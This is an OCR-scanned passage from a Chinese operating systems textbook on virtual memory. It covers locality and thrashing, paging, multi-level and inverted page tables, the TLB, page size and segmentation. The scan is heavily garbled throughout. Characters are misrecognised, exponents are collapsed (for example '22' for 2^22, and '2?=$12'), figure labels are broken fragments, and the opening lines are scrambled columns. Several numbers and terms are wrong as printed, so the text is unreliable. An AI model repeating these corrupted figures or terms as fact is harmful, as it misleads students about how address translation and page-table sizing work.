处 理 器 使 用 页 写 和 偏 | ”处 理 器 使 用 页 本 和 偏 | 处理 吕 使 用 眉 导 和 偏 移 量 | 处 理 回 使 用 段 号 和 偏 移 重 
移 量 来 计算 绝对 地 址 | 移 量 来 计算 绝对 地 址 | 来 计算 绝对 地 址 来 计算 绝对 地 址 

当 进 程 运行 时 , 它 的 所 人 当 进 程 在 运行 时 , 它 的 所 有 | ” 当 进 程 在 运行 时 ， 并 不 是 
有 页 必须 都 在 内 存 中 , 除 | 是 它 段 都 必须 在 内 存 中 , 除非 使 用 | 它 的 所 有 段 都 必须 在 内 存 页 


非 使 用 了 覆盖 技术 ee 了 和 覆盖 技术 框 中 。 只 在 需要 时 才 读 人 段 


A E 
需要 把 另 一 页 写 到 磁盘 出 到 磁盘 





8.1.1 局 部 性 和 虚拟 内 存 


虚拟 内 存 的 优点 是 很 只 有 吸引 力 的 ， 但 这 个 方案 切实 可 行 吗 ? 关于 这 一 点 曾经 有 过 相当 
多 的 争论 ， 但 是 众多 操作 系统 中 的 经 验 已 多 次 证 明了 虚拟 内 存 的 可 行 性 。 因 此 ， 基 于 分 页 或 者 
分 页 和 分 段 的 虚拟 内 存 已 经 成 为 当代 操作 系统 的 一 个 基本 构件 。 

为 理解 关键 问题 是 什么 以 及 为 什么 会 有 这 人 么 多 的 争论 ， 需 要 再 次 分 析 一 下 就 虚拟 内 存 而 言 
的 操作 系统 任务 。 考 虑 一 个 由 很 长 的 程序 和 许多 个 数组 的 数据 组 成 的 大 进程 。 在 任何 一 段 很 短 的 
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时 间 内 ， 执 行 可 能 会 局 限 在 很 小 的 一 段 程序 中 ( 如 一 个 子 程序 )， 并 且 可 能 仅仅 会 访问 一 个 或 两 
个 数组 的 数据 。 这样 ， 如 果 在 程序 被 挂 起 或 被 换 出 前 仅仅 使 用 了 一 部 分 进程 块 , 那么 为 该 进程 给 
内 存 中 装 和 信 太 多 的 块 显然 会 带 来 巨大 的 浪费 。 可 以 通过 仅仅 装 信 这 一 小 部 分 抉 来 更 好 地 使 用 内 
存 。 然 后 ， 如 果 程 序 转移 到 或 访问 到 不 在 内 存 中 的 某 个 块 中 的 指令 或 数据 ， 就 会 引发 一 个 错误 ， 
告诉 操作 系统 读 取 和 需要 的 块 。 

` 因此 , 在 任何 时 刻 , 任何 一 个 进程 只 有 一 部 分 块 位 于 内 存 中 , 可 以 在 内 存 中 保留 更 多 的 进程 。 
此 外 ， 由 于 未 用 到 的 块 不 需要 换 和 人 换 出 内 存 ， 因 而 节省 了 时 间 。 但 是 ， 操 作 系 统 必须 很 “聪明 ” 
地 管理 这 个 方案 。 在 稳定 状态 ,几乎 内 存 的 所 有 空间 都 被 进程 块 占据 , 处理 器 和 操作 系统 可 以 直 
接 访 问 到 尽 可 能 多 的 进程 。 因 此 ， 当 操作 系统 读 取 一 块 时 ， 它 必须 把 另 一 块 换 出 。 如 果 一 块 正好 
在 将 要 被 用 到 之 前 换 出 , 操作 系统 就 不 得 不 很 快 把 它 取 加 来。 太 多 的 这 类 操作 会 导致 一 种 称 为 系 
ELZ (thrashing) 的 情况 : 处 理 器 的 大 部 分 时 间 都 用 于 交换 块 ， 而 不 是 执行 指令 。 在 20 世纪 
70 年 代 ， 如 何 避 免 系统 抖动 是 一 个 重要 的 研究 领域 ， 同 时 也 出 现 了 许多 复杂 但 有 效 的 算法 。 从 
本 质 上 看 ， 这 些 算法 都 是 操作 系统 试图 根据 最 近 的 历史 来 猜测 在 不 远 的 将 来 最 可 能 用 到 的 块 。 

这 类 推断 基于 局 部 性 原理 (principle of locality )， 局 部 性 原理 在 本 书 第 1 章 曾 经 介绍 过 ( 参 
见 附录 1A )。 概 括 来 说 ， 局 部 性 原理 描述 了 一 个 进程 中 程序 和 数据 引用 的 集 篮 倾向 。 因 此 ， 假 设 
在 很 短 的 时 间 内 仅 需 要 进程 的 一 部 分 块 是 合理 的 。 同时 , 还 可 以 对 在 不 远 的 将 来 可 能 会 访问 的 块 
进行 猜测 ， 从 而 避免 系统 拌 动 。 

证 实 局 部 性 原理 的 一 种 方法 是 在 虚拟 内 存 环境 中 查看 进程 的 执行 情况 。 图 8.1 是 一 个 动态 地 
阐明 了 局 部 性 原理 的 著名 图 表 [ HATF72 ]。 注 意 ， 在 进程 的 生命 周期 中 ,所 有 引用 都 局 限 在 进程 
页 的 一 个 子 集中 。 





中 - eer here 
S 18 l, > ia a among i 
| 执行 时 间 一 

图 8.1 分 页 下 的 运行 情况 


局 部 性 原理 说 明了 虚拟 内 存 方案 是 可 行 的 。 为 了 使 虚拟 内 存 比较 实用 并 且 有 效 , 需要 两 方面 
的 因素 。 首 先 ， 必 须 有 对 所 采用 的 分 页 或 分 段 方案 的 硬件 支持 ; 其 次 , 操作 系统 必须 有 管理 页 或 
自在 内 存 和 辅助 存储 器 ( 简称 辅 存 ) 之 间 移 动 的 软件 。 本 节 首 先 分 析 硬 件 特征 ,然后 介绍 贝 操作 
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系统 创建 并 维护 、 供 内 存 管 理 硬件 使 用 的 必要 的 控制 结构 。 下 一 节 将 介绍 操作 系统 方面 的 问题 。 


8.1.2 分 页 


虽然 存在 基于 分 段 的 虚拟 内 存 ( 接 下 来 会 讲述 )， 术 语 虚 拟 内 存 通常 与 使 用 分 页 的 系统 联系 在 
一 起 。 第 一 个 使 用 分 页 实现 虚拟 内 存 的 是 Atlas 计算 机 [KILB62]， 随 后 很 快 广泛 应 用 于 商业 用 途 。 

在 讲述 简单 分 页 时 ， 曾 指出 每 个 进程 都 有 自己 的 页 表 ， 当 它 的 所 有 页 都 装 人 到 内 存 中 时 ,页 
表 被 创建 并 被 装 人 内 存 。 页 表 项 ( Page Table Entry, 简称 PTE) 包含 有 与 内 存 中 的 页 框 相 对 应 的 
页 框 号 。 当 考虑 基于 分 页 的 虚拟 内 存 方案 时 也 同样 需要 页 表 , 并 且 通 常 每 个 进程 都 有 一 个 唯一 的 
WR, 但 这 时 页 表 项 变 得 更 复杂 ， 如 图 8.2a 所 示 。 由 于 一 个 进程 可 能 只 有 一 些 页 在 内 存 中 ， 因 
而 每 个 页 表 项 需要 有 一 位 (P) 来 表示 它 所 对 应 的 页 当前 是 否 在 内 存 中 。 如 果 这 一 位 表示 该 页 在 
内 存 中 ， 则 这 个 页 表 项 还 包括 该 页 的 页 框 号 。 


虚拟 地 址 





RRR | 











a) 仅仅 分 页 








P 表示 存在 位 
M 表示 修改 位 
c) SP BASH AA 


图 8.2 典型 的 内 存 管理 格式 


页 表 项 中 所 需要 的 另 一 个 控制 位 是 修改 位 ( M )， 表 示 相 应 页 的 内 容 从 上 一 次 装 入 内 存 中 到 
现在 是 否 已 经 改变 。 如 果 没 有 改变 , 则 当 需 要 把 该 页 换 出 时 , 不 需要 用 页 框 中 的 内 容 更 新 该 页 。 
还 必须 提供 其 他 一 些 控制 位 ， 例 如 ， 如 果 需 要 在 页 一 级 控制 保护 或 共享 ， 则 需要 用 于 这 些 目的 
的 位 。 


页 表 结 构 

从 存储 器 中 读 取 一 个 字 的 基本 机 制 包括 使 用 页 表 从 虚拟 地 址 到 物理 地 址 的 转换 。 虚拟 地 址 
又 称 为 逻辑 地 址 , 由 页 号 和 偏 移 量 组 成 , 而 物理 地 址 由 页 框 号 和 偏 移 量 组 成 。 由 于 页 表 的 长 度 可 
以 基于 进程 的 长 度 而 变化 , 因而 不 能 期 望 在 寄存 器 中 保存 它 , 它 必须 在 内 存 中 且 可 以 访问 到 。 图 
8.3 给 出 了 一 种 硬件 实现 。 当 一 个 特定 的 进程 正在 运行 时 ， 一 个 寄存 器 保存 该 进程 页 表 的 起 始 地 
址 。 虚 拟 地 址 的 页 号 用 于 检索 页 表 、 查 找 相 应 的 页 框 号 ,并 与 虚拟 地 址 的 偏 移 量 组 合 起 来 产生 需 
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要 的 实地 址 。 一 般 来 说 ， 页 号 域 长 于 页 框 号 域 (n>m) 

在 大 多 数 系 统 中 , 每 个 进程 都 有 一 个 页 表 。 但 是 每 个 进程 可 以 占据 大 量 的 虚拟 内 存 空间 。 例 
如 , Æ VAX 系统 结构 中 ,每 个 进程 可 以 有 接近 2 =2GB 的 虚拟 内 存 空 间 ， 如果 使 用 2?=$12 F 
节 的 页 ， 这 意味 着 每 个 进程 需要 有 22 个 页 表 项 。 显 然 ， 采 用 这 种 方法 用 于 放置 页 表 的 内 存 容 间 
实在 太 多 了 。 为 了 克服 这 个 问题 , 大 多 数 碟 拟 内 存 方案 都 在 虚拟 内 存 中 而 不 是 在 实 内 存 中 保存 页 
表 。 这 意味 着 页 表 和 其 他 页 一 样 都 服从 分 页 管理 。 当 一 个 进程 正在 运行 时 , 它 的 页 表 至 少 有 一 部 
分 必须 在 内 存 中 ， 这 一 部 分 包括 正在 运行 的 页 的 页 表 项 。 一 些 处 理 器 使 用 两 级 方案 组 织 大 型 页 表 。 
在 这 类 方案 中 有 一 个 页 目录 ,每 一 项 指向 一 个 页 表 ， 因此， 如 果 页 目录 的 长 度 为 写 , 并 且 如 果 一 
个 页 表 的 最 大 长 度 为 Y， 一 个 进程 可 以 及 x 了 页 。 在 典型 情况 下 ， 一 个 页 表 的 最 大 长 度 被 限制 
为 一 页 。 例 如 ，Pentium 处 理 器 就 使 用 了 这 种 方法 。 
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图 8.4 给 出 了 一 个 用 于 32 位 地 址 的 两 级 方案 的 典型 例子 。 假 设 采用 字 节 级 的 寻 址 ， 页 尺寸 
为 4KB (22 )， 那 么 4GB ( 22 ) 的 虚拟 地 址 空间 由 22 页 组 成 。 如 果 这 些 页 中 的 每 一 个 都 由 一 个 
4 字 节 的 页 表 项 映射 ， 则 可 以 创建 一 个 由 2 个 页 表 项 组 成 的 页 表 ， 这 时 怖 民 4MB ( 2”) 内 存 空 
间 。 这 个 由 2° 页 组 成 的 巨大 的 用 户 页 表 可 以 保留 在 虚拟 内 存 中 ， 由 一 个 包括 2° 个 页 表 项 的 根 
页 表 映 射 ， 根 页 表 占 据 4KB (2°) 的 内 存 。 图 8.5 给 出 了 这 种 方案 中 地 扯 转换 所 涉及 的 步 又 。 虚 
拟 地 址 的 前 10 位 用 于 检索 根 页 表 ， 查 找 关于 用 户 页 表 的 页 的 页 表 项 。 如 果 该 页 不 在 内 存 中 ， 则 
发 生 一 次 缺 页 中 断 。 如 果 该 页 在 内 存 中 ， 则 用 虚拟 地 址 中 接 下 来 的 10 位 检索 用 户 页 表 项 页 ， 查 
找 该 虚拟 地 址 引用 的 页 的 页 表 项 。 





图 8.4 两 级 层次 页 表 
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4KB 页 表 
根 页 表 (包含 1024 个 页 表 项 ) 
(包含 1024 个 页 表 项 ) 


分 页 机 制 : 
图 8.5 ”两 级 分 页 系统 中 的 地 址 转换 
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内 存 


倒 排 页 表 ; 

前 面 讨 论 的 页 表 设 计 的 一 个 重要 缺陷 是 页 表 的 大 小 与 虚拟 地 址 空间 的 大 小 成 正比 。 

使 用 一 级 或 多 级 页 表 的 一 种 替代 方法 是 使 用 一 个 侄 排 页 表 结 构 ， 该 方法 的 各 种 变种 用 于 
PowerPC, UltraSPARC 和 IA-64 体系 结构 中 ，RT-PC 上 的 Mach 操作 系统 的 实现 也 使 用 了 这 种 
技术 。 

在 这 种 方法 中 ,虚拟 地 址 的 页 号 部 分 使 用 一 个 简单 的 散 列 函数 映射 到 散 列表 中 8 。 散 列表 包 
含 一 个 指向 倒 排 表 的 指针 ， 而 倒 排 表 中 含有 页 表 项 。 通 过 这 个 结构 ,， 散 列表 和 倒 排 表 中 各 有 一 项 
对 应 于 一 个 实 存 页 ， 而 不 是 虚拟 页 。 因 此 ,不 论 有 多 少 进程 、 支 持 多 少 虚拟 页 ， 页 表 都 只 需要 实 
存 中 的 一 个 固定 部 分 。 由 于 多 个 虚拟 地 址 可 能 上 映射 到 同一 个 散 列 表 项 中 , 因此 需要 使 用 一 种 链接 
技术 管理 这 种 溢出 。 散 列 技术 使 得 链 一 般 都 比较 短 , 通常 只 有 一 到 两 项 。 页 表 的 结构 称 为 “ 倒 排 ” 
是 因为 它 使 用 页 框 号 而 不 是 虚拟 页 号 来 索引 页 表 项 。 

图 8.6 说 明了 一 个 便 排 页 表 方 法 的 典型 实现 。 对 于 大 小 为 2" 个 页 框 的 物理 内 存 ， 倒 排 页 表 
包含 2" 项 ， 所 以 第 i 个 项 对 应 第 i 个 页 框 。 页 表 中 的 每 项 都 包含 如 下 内 容 : 

@ 页 号 : 虚拟 地 址 的 页 号 部 分 。 | 

© 进程 标志 符 : 使 用 该 页 的 进程 。 页 号 和 进程 标志 符 结合 起 来 标志 一 个 特定 进程 的 虚拟 地 

址 空间 的 一 页 。 l 

@ 控制 位 : 该 域 包含 一 些 标记 ， 比 如 有 效 、 访 问 和 修改 ; 以 及 保护 和 锁定 信息 。 

o 链 指针 : 如 果 某 个 项 没有 链 项 ， 则 该 域 为 空 (或 许 用 一 个 单独 的 位 来 表示 )。 否 则 ， BR 

包含 链 中 下 一 项 的 索引 值 (在 0 到 2"-1 之 间 的 数字 )。 

在 图 8.6 的 例子 中 ， 虚拟 地 址 包含 一 个 n 位 的 页 号 ， 并且 nm BABAR 位 页 号 到 m 
位 数 ， 这 个 mm 位 数 用 于 索引 倒 排 页 表 。 


转换 检测 缓冲 区 

原则 上 , 每 个 虚 存 访问 可 能 引起 两 次 物理 内 存 访问 ; 一 次 取 相 应 的 页 表 项 , 一 次 取 需 要 的 数 
据 。 因 此 ,简单 的 虚拟 内 存 方案 会 导致 存储 器 访问 时 间 加 倍 。 为 克服 这 个 问题 ， 大 多 数 虚拟 内 存 
方案 为 页 表 项 使 用 一 个 特殊 的 高 速 缓存 , 通常 称 做 转换 检测 缓冲 区 ( Translation Lookaside Buffer, 
TLB )。 这 个 高 速 缓存 的 功能 和 高 速 缓冲 存储 器 ( 见 第 1 章 ) 相似 ， 包 含 最 近 用 过 的 页 表 项 。 由 
此 得 到 的 分 页 硬件 组 织 如 图 8.7 所 示 。 给 定 一 个 虚拟 地 址 ,处 理 器 首先 检查 TLB ， 如 果 需 要 的 页 


O 见 附录 8A 中 关于 散 列 技术 的 讨论 。 
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表 项 在 其 中 ( TLB 命中 )， 则 检索 页 框 号 并 形成 实地 址 。 如 果 没 有 找到 需要 的 页 表 项 (TLB 未 命 
中 )， 则 处 理 器 用 页 号 检索 进程 页 表 ， 并 检查 相应 的 页 表 项 。 如 果 “ 存 在 位 ”已 置 位 ， 则 该 页 在 
内 存 中 ， 处 理 器 从 页 表 项 中 检索 页 框 号 以 形成 实地 址 。 处 理 器 同时 更 新 TLB， 使 其 包含 这 个 新 
的 页 表 项 。 最 后 ， 如 果 “ 存 在 位 ”没有 置 位 ， 则 表示 需要 的 页 不 在 内 存 中 ,这 时 将 产生 一 次 存储 
器 访问 故障 ， 称 为 缺 页 (page fault) 中 断 。 这 时 离开 硬件 作用 范围 ， 调用 操作 系统 ， 由 操作 系统 
负责 装 人 所 需要 的 页 ， 并 更 新 页 表 。 


虚拟 地 址 
n Wi. 





倒 排 页 表 “i 
《每 个 物理 内 存 页 框 一 项 ) 实地 址 


图 8.6 BARRA 
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[页 号 | 偏 移 量 





转移 后 备 缓冲 区 








图 8.7 ”转换 检测 缓冲 区 的 用 法 


图 8.8 中 的 流程 图 表明 了 TLB 的 使 用 。 如 果 需 要 的 页 不 在 内 存 中 ， 一 个 缺 页 中 断 导 致 调 用 
缺 页 中 断 处 理 例 程 。 为 保持 流程 图 简洁 ,图 中 没有 表明 在 磁盘 VO 过 程 中 操作 系统 可 以 分 派 另 一 
个 进程 执行 。 根 据 局 部 性 原理 , 大 多 数 虚拟 内 存 访 问 都 位 于 最 近 使 用 过 的 页 中 , 因此, KER 
问 将 调用 高 速 缓 存 中 的 页 表 项 。 针 对 VAX TLB 的 研究 表明 ， 该 方案 可 以 较 大 地 提高 性 能 
[ CLAR85, SATY81 ]。 l 
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返回 故障 指令 


图 8.8 ”分 页 和 转移 检测 缓冲 区 (TLB) 的 操作 [FURHS87 | 


关于 TLB 的 实际 组 织 还 有 很 多 另外 的 细节 问题 。 由 于 TLB 仅 包 含 整个 页 表 中 的 部 分 表 项 ， 所 
以 不 能 简单 地 把 页 号 编 入 TLB 的 索引 。 相 反 ，TLB 中 的 项 必须 包括 页 号 以 及 完整 的 页 表 项 。 处 理 器 
中 的 硬件 机 制 允许 同时 查询 许多 TLB 页 ， 以 确定 是 否 存在 匹配 的 页 号 。 对 应 于 图 8.9 中 在 页 表 中 查 
找 所 使 用 的 直接 映射 或 索引 ， 该 技术 称 为 关联 映射 ( associative mapping )。TLB 的 设计 还 必须 考虑 
TLB 中 表 项 的 组 织 方法 ， 以 及 当 读 取 一 个 新 项 时 置换 哪 一 项 。 这 些 问题 是 任何 硬件 高 速 缓存 设计 中 
都 必须 考虑 的 , 这 里 不 再 继续 讨论 , 详细 信息 请 参阅 高 速 缓存 设计 方面 的 资料 (例如 [ STAL06a ] )。 


虚拟 地 址 虚拟 地 
页 号 偏 移 量 页 框 号 偏 移 量 








WE m 转移 后 备 缓冲 区 页 框 号 偏 移 量 
实地 址 实地 址 





页 表 
a) 直接 映射 b ) 关联 映射 


图 8.9 页 表 项 的 直接 查找 和 关联 查找 
最 后 ， 虚 拟 内 存 机 制 必须 与 高 速 缓存 系统 ( 不 是 TLB 高 速 缓 存 ， 而 是 内 存 高 速 缓存 ) 进行 
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交互 ， 如 图 810 所 示 。 一 个 虚拟 地 址 通常 为 页 号 、 偏 移 量 的 形式 。 首 先 ， 内 存 系统 查看 TLB 中 
是 否 存在 匹配 的 页 表 项 ， 如 果 存 在 ,通过 把 页 框 号 和 偏 移 量 组 合 起 来 产生 实地 址 ( 物理 地 址 ); 
如 果 不 存 在 ， 则 从 页 表 中 读 取 页 表 项 。 一 旦 产生 了 由 一 个 标记 (tag) 9 和 其 余部 分 组 成 的 实地 
址 ， 则 查看 高 速 缓存 中 是 否 存 在 包含 这 个 字 的 块 。 如 果 有 ， 把 它 返 回 给 CPU; 如 果 没 有 ， 从 内 
存 中 检索 这 个 字 。 

需要 注意 在 一 次 存储 器 访问 中 涉及 CPU 硬件 的 复杂 人 性。 虚拟 地 址 被 转换 成 实地 址 ， 这 涉及 
访问 页 表 项 ， 而 页 表 项 可 能 在 TLB 中 ， 也 可 能 在 内 存 中 或 磁盘 中 ， 且 被 访问 的 字 可 能 在 高 速 组 
存 中 、 内 存 中 或 磁盘 中 。 如 果 被 访问 的 字 只 在 磁盘 中 , 则 包含 该 字 的 页 必须 装 人 内 存 中 , 并 且 它 
所 在 的 块 装 人 到 高 速 缓存 中 。 此 外 ， 包 含 该 字 的 页 对 应 的 页 表 项 必须 被 更 新 。 





TLB 命中 ， 操作 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 1 





图 8.10 ”转换 检测 缓冲 区 和 高 速 缓存 操作 


页 尺寸 

页 尺寸 是 一 个 重要 的 硬件 设计 决策 ， 需 要 考虑 多 方面 的 因素 。 其 中 一 个 因素 是 内 部 碎片 。 显 
R, 页 越 小 ， 内 部 碎片 的 总 量 越 少 。 为 优化 内 存 的 使 用 ,通常 希望 减少 内 部 碎片 ; 另 一 方面 ,页 
越 小 , 每 个 进程 需要 的 页 的 数目 就 越 多 ,这 就 意味 着 更 大 的 页 表 。 对 于 多 道 程序 设计 环境 中 的 大 
EF, 这 就 意味 着 活动 进程 有 一 部 分 页 表 在 虚拟 内 存 中 ,而 不 是 在 内 存 中 。 从 而 一 次 存储 器 访问 
可 能 产生 两 次 缺 页 中 断 : 第 一 次 读 取 所 需 的 页 表 部 分 ,第 二 次 读 取 进 程 病 。 另 一 个 因素 是 基于 大 
多 数 辅 存 设备 的 物理 特性 ， 希 望 页 尺寸 能 比较 大 ， 从 而 实现 更 有 效 的 数据 块 传送 。 

页 尺寸 对 缺 页 中 断 发 生 概率 的 影响 使 这 些 问 题 变 得 更 为 复杂 。 一 般 而 言 ， 基 于 局 部 性 原理 ， 
其 性 能 如 图 8.11a 所 示 。 如 果 页 尺寸 非常 小 ， 那么 每 个 进程 在 内 存 中 有 较 多 数目 的 页 。 一 段 时 间 
E, 内 存 中 的 页 都 包含 有 最 近 访 问 的 部 分 因此, 缺 页 率 比 较 低 。 当 页 尺寸 增加 时 ， 每 一 页 包含 
的 单元 和 任何 一 个 最 近 访 问 过 的 单元 越 来 越 远 。 因 此 局 部 性 原理 的 影响 被 削弱 ， 缺 页 率 开始 
增长 。 但 是 当 页 尺寸 接近 整个 进程 的 大 小 时 ( 图 示 的 尸 点 )， 缺 页 率 开始 下 降 。 当 一 个 页 包含 整 
个 进程 时 ， 不 会 发 生 缺 页 中 断 。 


© ”参见 图 1.17。 一 般 来 说 ， 标 记 只 是 实地 址 最 左边 的 位 。 关于 高 速 缓存 的 更 多 讨论 ， 请 参考 [STAL06al。 
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更 为 复杂 的 是 ， 缺 页 率 还 取决 于 分 配给 一 个 进程 的 页 框 的 数目 。 图 8.11b 表明 ， 对 国定 的 页 
尺寸 ， 当 内 存 中 的 页 数目 增加 时 ， 缺 页 率 会 下 降 e 。 因 此 ， 软 件 策略 ( 分 配给 每 个 进程 的 内 存 总 
量 ) 影响 着 硬件 设计 决策 ( 页 尺寸 )。 


页 错误 率 
页 错误 率 








wW 
a) 页 尺寸 b) 分 配 的 页 框 数目 
了 表示 整个 进程 的 大 小 ， 扩 表示 工作 集 大 小 ，N 表示 进程 中 的 总 页 数 


图 8.11 典型 的 分 页 行为 


表 8.3 给 出 了 大 多 数 机 器 中 采用 的 页 尺寸 。 
最 后 ,页 斥 十 的 设计 问题 与 物理 内 存 的 大 小 和 程序 大 小 有 关 。 当 内 存 变 大 时 , 应 用 程序 使 用 
的 地 址 空间 也 相应 地 增长 ,这 种 趋势 在 个 人 计算 机 和 工作 站 上 更 为 显著 。 此 外 , 大 型 程序 中 所 使 
用 的 当代 程序 设计 技术 可 能 会 降低 进程 中 的 局 部 性 [ HUCK93 ]。 例 如 : 
@ 面向 对 象 技术 鼓励 使 用 小 程序 和 数据 模块 ， 关 于 它们 的 引用 在 相对 比较 短 的 时 间 里 散布 
在 相对 比较 多 的 对 象 中 。 
o 多 线程 应 用 可 能 导致 指令 流 和 分 散 的 存储 器 访问 的 突然 变化 。 


R83 页 尺寸 的 例子 


计算 机 ARY} 

Atlas 512 个 48 位 字 
Honeywell-Multics 1024 个 36 位 字 
IBM 370/XA 和 370/ESA 4KB 
IBM AS/400 512 字 节 
DEC Alpha 8KB 
MIPS 4KB ~ 16MB 
UltraSPARC 8KB ~ 4MB 
Pentium 4KB ~ 4MB 

` IBM POWER 4KB 
Itanium 4KB ~ 256MB 


对 于 给 定 大 小 的 TLB ， 当 进程 的 内 存 大 小 增加 并 且 局 部 性 降低 时 ，TLB 访问 的 命中 率 降 低 。 
在 这 种 情况 下 ，TLB 可 能 成 为 一 个 性 能 瓶颈 〈 例 如 ， 见 [CHEN92 ] )。 

提高 TLB 性 能 的 一 种 方法 是 使 用 包含 更 多 项 的 更 大 的 TLB。 但是，TLB 的 大 小 会 影响 其 他 
的 硬件 设计 特征 ， 如 内 存 高 速 缓存 和 每 个 指令 周期 访问 内 存 的 数量 [ TALL92 ]， 因 此 TLB 的 大 
小 不 可 能 像 内 存 大 小 增长 得 那么 快 。 一 种 可 选 的 方法 是 采用 更 大 的 页 ， 使 得 TLB 中 的 每 个 页 表 
项 对 应 于 更 大 的 存储 块 。 但 由 前 面 的 讨论 得 知 ， 采 用 较 大 的 页 可 能 导致 性 能 下 降 。 


O 变量 友人 代表 工作 集 的 大 小 ， 其 概念 将 在 8.2 节 讨 论 。 
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因此 ， 很 多 硬件 设计 者 都 尝试 使 用 多 种 页 大 小 [ TALL92，KHAL93 ]， 并 日 很 多 微 处 理 器 体 
系 结构 支持 多 种 页 尺寸 ， 包 括 MIPS R4000、Alpha、UltraSPARC Pentium 和 IA-64 等 。 多 种 页 
尺寸 为 有 效 地 使 用 TLB 提供 了 很 大 的 灵活 性 。 例 如 ， 一 个 进程 的 地 址 空间 中 一 大 片 连续 的 区 域 
( 如 程序 指令 )， 可 以 使 用 数目 较 少 的 大 页 映射 ， 而 线程 栈 则 可 以 使 用 较 小 的 页 来 映射 。 但是, 大 
多 数 商 业 操 作 系 统 仍然 只 支持 一 种 页 尺寸 ， 而 不 管 底层 硬件 的 能 力 。 其 原因 是 页 尺寸 影响 操作 系 
统 的 许多 特征 ， 因 此 操作 系统 支持 多 种 页 尺寸 是 一 项 复杂 的 任务 (相关 论述 参见 [ GANA98 ])。 


8.1.3 分 段 


虚拟 内 存 的 含义 
分 段 允 许 程序 员 把 内 存 看 成 由 多 个 地 址 空间 或 段 组 成 ， 段 的 大 小 是 不 相等 的 ,并 且 是 动态 
的 。 存 储 器 访问 以 段 号 和 偏 移 量 的 形式 组 成 的 地 址 。 
对 程序 员 而 言 ， 这 种 组 织 与 非 段 式 地 址 空间 相 比 有 许多 优点 : 
1) 简化 对 不 断 增 长 的 数据 结构 的 处 理 。 如 果 程 序 员 事先 不 知道 一 个 特定 的 数据 结构 会 变 得 
多 大 ,除非 允许 使 用 动态 的 段 大 小 , 否则 必须 对 其 大 小 进行 猜测 。 而 对 于 段 式 虚拟 内 存 ， 
这 个 数据 结构 可 以 分 配 到 它 自己 的 段 ， 需 要 时 操作 系统 可 以 扩大 或 缩小 这 个 段 。 如 果 需 
要 被 扩大 的 段 在 内 存 中 ,并且 内 存 中 已 经 没有 足够 的 空间 ， 操 作 系 统 可 能 把 这 个 段 移 到 
内 存 中 的 一 个 更 大 的 区 域 ( 如 果 可 以 得 到 ), 或 者 把 它 换 出 。 对 于 后 一 种 情况 , 被 扩大 的 
段 将 在 下 一 次 有 机 会 时 被 换 回 。 

2) 允许 程序 独立 地 改变 或 重新 编译 ， 而 不 要 求 整 个 程序 集合 重新 链接 和 重新 加 载 。 同 样 ， 
这 也 是 使 用 多 个 段 实现 的 。 

3) 有 助 于 进程 间 的 共享 。 程 序 员 可 以 在 段 中 放置 一 个 实用 工具 程序 或 一 个 有 用 的 数据 表 ， 
供 其 他 进程 访问 。 i 

4) 有 助 于 保护 。 由 于 一 个 段 可 以 被 构造 成 包含 一 个 明确 定义 的 程序 或 数据 集 ， 因 而 程序 员 
或 系统 管理 员 可 以 更 方便 地 指定 访问 权限 。 

组 织 

在 讨论 简单 分 段 时 , 曾 指出 每 个 进程 都 有 自己 的 段 表 ,， 当 它 的 所 有 自 都 装 人 内 存 时 ,为 该 进 
程 创建 一 个 段 表 并 装 人 内 存 。 每 个 段 表 项 包含 相应 段 在 内 存 中 的 起 始 地 址 和 段 的 长 度 。 基 于 分 段 
的 虚拟 内 存 方案 仍然 需要 段 表 这 个 设计 , 并 且 每 个 进程 都 有 一 个 唯一 的 段 表 。 在 这 种 情况 下 ,， 段 
表 项 变 得 更 加 复杂 ， 如 图 8.2b 所 示 。 由 于 一 个 进程 可 能 只 有 一 部 分 段 在 内 存 中 ， 因 而 每 个 段 表 
项 中 需要 有 一 位 表明 相应 的 段 是 否 在 内 存 中 。 如 果 这 一 位 表明 该 段 在 内 存 中 , 则 这 个 表 项 还 包括 
该 段 的 起 始 地 址 和 长 度 。 

段 表 项 中 需要 的 另 一 个 控制 位 是 修改 位 ， 用 于 表明 相应 的 段 从 上 一 次 被 装 人 内 存 到 目前 
为 止 其 内 容 是 否 被 改变 。 如 果 没 有 改变 ， 把 该 段 换 出 时 就 不 需要 写 回 。 同 时 还 可 能 需要 其 他 
的 控制 位 ， 例 如 若 要 在 段 级 来 管理 保护 或 共享 ， 则 需要 具有 用 于 这 种 目的 的 位 。 

从 存储 器 中 读 一 个 字 的 基本 机 制 涉及 使 用 段 表 来 将 段 号 和 偏 移 量 组 成 的 虚拟 地 址 (或 逻辑 
地 址 ) 转换 为 物理 地 址 。 根 据 进 程 的 大 小 ， 段 表 长 度 可 变 ， 而 无 法 在 寄存 器 中 保存 ， 因 此 访问 
段 表 时 它 必须 在 内 存 中 。 图 8.12 表明 了 该 方案 的 一 种 硬件 实现 (与 图 8.3 类 似 )。 当 一 个 特定 
的 进程 正在 运行 时 ， 有 一 个 寄存 器 为 该 进程 保存 段 表 的 起 始 地 址 。 虚 拟 地 址 中 的 段 号 用 于 检索 
RTH, 并 查找 该 段 起 点 的 相应 内 存 地 址 。 这 个 地 址 加 上 虚拟 地 址 中 的 偏 移 量 部 分 ,产生 了 需 
要 的 实地 址 。 


P&E BARA F 243 


虚拟 地 址 












分 段 机 制 内 存 


图 8.12 ”分 段 系统 中 的 地 址 转换 


8.1.4 RAK 


分 页 和 分 段 都 有 它们 的 长 处 。 分 页 对 程序 员 是 透明 的 ， 它 消除 了 外 部 碎片 ,因而 可 以 更 有 效 
地 使 用 内 存 。 此 外 , 由 于 移 和 人 或 移出 内 存 的 抉 是 固定 的 、 大 小 相等 的 ,因而 有 可 能 开发 出 更 精致 
的 存储 管理 算法 。 分 段 对 程序 员 是 可 见 的 , 它 具 有 处 理 不 断 增长 的 数据 结构 的 能 力 以 及 支持 共享 
和 保护 的 能 力 。 为 了 把 它们 二 者 的 优点 结合 起 来 ,一 些 系 统 配备 了 特殊 的 处 理 器 硬件 和 操作 系统 
软件 来 同时 支持 这 两 者 。 

在 段 页 式 的 系统 中 , 用 户 的 地 址 空间 被 程序 员 划 分 成 许多 段 。 每 个 眉 依 次 划分 成 许多 说 定 大 
小 的 页 , 页 的 长 度 等 于 内 存 中 的 页 框 大 小 。 如 果 某 一 段 的 长 度 小 于 一 页 , 则 该 段 只 占据 一 页 。 从 
程序 员 的 角度 看 , 逻辑 地 址 仍然 由 眉 号 和 有 段 偏 移 量 组 成 ; 从 系统 的 角度 看 ， 段 偏 移 量 可 看 做 是 指 
定 段 中 的 一 个 页 号 和 页 偏 移 量 。 





虚拟 地 址 








程序 分 段 机 制 

